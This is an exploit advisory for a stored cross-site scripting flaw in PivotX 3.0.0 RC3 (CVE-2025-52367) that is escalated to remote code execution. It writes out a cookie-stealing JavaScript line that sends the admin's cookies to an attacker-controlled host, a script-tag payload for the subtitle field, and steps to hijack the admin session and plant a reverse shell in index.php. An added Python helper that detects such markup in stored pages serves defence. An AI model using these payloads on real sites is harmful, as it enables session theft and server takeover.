
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367

## Vulnerability Type:

Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().

## Root Cause:

In 'modules/pages_flat.php', the function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.

Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML); 'title' and 'subtitle' are rendered as raw HTML.
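As an added example (not code from the advisory or from PivotX itself), a defender-side audit helper that parses the PHP-serialized page records the advisory mentions and flags markup stored in the raw-rendered 'title' and 'subtitle' fields; the record layout, field names and the sample record are assumptions made for the demo:

```python
# Added example (not from the advisory or the PivotX code base): parse PHP-serialized
# page records, which PivotX writes with serialize(), and flag markup in "title" and
# "subtitle", the fields rendered unescaped. Record layout and field names are assumed.
import re

def php_serialize(v) -> bytes:
    """Tiny PHP serialize() for int/str/dict, enough to build sample records."""
    if isinstance(v, int):
        return b"i:%d;" % v
    if isinstance(v, str):
        raw = v.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)     # length counts bytes, not characters
    body = b"".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
    return b"a:%d:{%s}" % (len(v), body)

def php_unserialize(data: bytes, pos: int = 0):
    """Minimal PHP unserialize() for the same types; returns (value, next_pos)."""
    tag = data[pos:pos + 1]
    if tag == b"i":
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag not in (b"s", b"a"):
        raise ValueError(f"unsupported tag {tag!r} at offset {pos}")
    colon = data.index(b":", pos + 2)
    n = int(data[pos + 2:colon])                    # string length or element count
    if tag == b"s":
        start = colon + 2                           # skip :"
        return data[start:start + n].decode("utf-8", "replace"), start + n + 2  # skip ";
    pos, out = colon + 2, {}                        # skip :{
    for _ in range(n):
        key, pos = php_unserialize(data, pos)
        out[key], pos = php_unserialize(data, pos)
    return out, pos + 1                             # skip }

MARKUP = re.compile(r"<\s*/?[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.I)  # tags, handlers, js: URLs
RAW_FIELDS = ("title", "subtitle")                  # rendered as raw HTML per the advisory

def find_unescaped_markup(record: bytes) -> dict:
    """Return {field: value} for raw-rendered fields whose stored value contains markup."""
    page, _ = php_unserialize(record)
    return {f: page[f] for f in RAW_FIELDS
            if isinstance(page.get(f), str) and MARKUP.search(page[f])}

# Constructed sample record: a harmless title and a subtitle carrying the advisory's payload.
SAMPLE_PAGE = php_serialize({
    "uid": 7,
    "title": "Release notes",
    "subtitle": '<script src="http://LOCAL_IP/lol.js"></script>',
    "body": "&lt;p&gt;entity-encoded by TinyMCE&lt;/p&gt;",
})
```

Running find_unescaped_markup over every stored page file tells an operator which records already carry injected markup; the rendering gap itself closes when the admin templates pass these two fields through htmlspecialchars() (ENT_QUOTES, UTF-8) on output, as the TinyMCE fields effectively already are.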
## Exploitation Steps:

Note: If you are already admin, skip steps 1-7.

1. Log in as an authenticated user (a normal user; admin is not needed).

2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page

3. Create a JavaScript file locally containing cookie-stealing code.

For example: lol.js

Containing:

document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;

4. In the "Subtitle" field, input the following payload (be sure to change the file name to match yours):

<script src="http://LOCAL_IP/lol.js"></script>

5. Publish the page.

6. When an admin views the published page in the blog, the XSS will execute in the admin's context.

7. Using this XSS, send a payload to steal the admin's cookies, then use the stolen cookies in your own session.

8. Navigate, as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit the index.php file.

9. Edit index.php to contain whatever PHP you want to run on the target to gain RCE, for example a reverse shell or any other method.

10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)

# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3